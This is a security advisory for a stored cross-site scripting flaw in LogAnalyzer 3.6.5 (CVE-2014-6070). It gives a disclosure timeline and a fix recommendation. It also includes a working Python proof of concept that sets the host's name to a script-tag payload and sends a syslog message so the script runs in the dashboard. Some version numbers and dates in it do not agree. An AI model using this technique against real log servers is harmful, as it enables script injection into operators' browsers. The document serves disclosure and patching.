Author: Dolev Farhi @dolevff Application: LogAnalyzer Date: 8.2.2014 Tested on: Red Hat Enterprise Linux 6.4 Relevant CVEs: CVE-2014-6070 1. About the application ------------------------ LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. 2. Vulnerabilities Descriptions: ----------------------------- It was found that an XSS injection is possible on a syslog server running LogAnalyzer version 3.6.5. by changing the hostname of any entity logging to syslog server with LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary syslog message, a client-side script injection execution is possible. 3. Life cycle -------------------- 8.2.2014 - Vulnerability identified 9.2.2014 - CVE Requested 9.2.2014 - CVE Assigned 9.2.2014 - Vendor releases a fix in a minor release version 3.6.6. 4. proof of concept ----------------------- a proof of concept video and a working exploit can be found here: http://research.openflare.org/poc/OF-2014-16/ #!/usr/bin/python # Exploit title = LogAnalyzer 3.5.6 Stored XSS injection # Date: Sept 2014 # Exploit Author: Dolev Farhi dolevf at yahoo dot com # Vendor homepage: loganalyzer.adiscon.com # Version: Stable 3.6.5 # Tested on Red Hat Enterprise Linux 6.4 # CVE: CVE-2014-6070 import os import syslog hostname = os.uname()[1] payload = "\"<script>alert('XSS');</script>\"" print("+ Setting temporary hostname to " + payload + "...") os.system("hostname " + payload) print("+ Injecting the syslog message...") syslog.syslog("syslog xss injection") print("+ Check LogAnalyzer dashboard...") raw_input("+ Press [enter] to restore hostname...") os.system("hostname " + "\"" + hostname + "\"") print("+ Hostname restored to " + hostname) 5. Recommendation -------------------------- upgrade to LogAnalyzer 3.6.6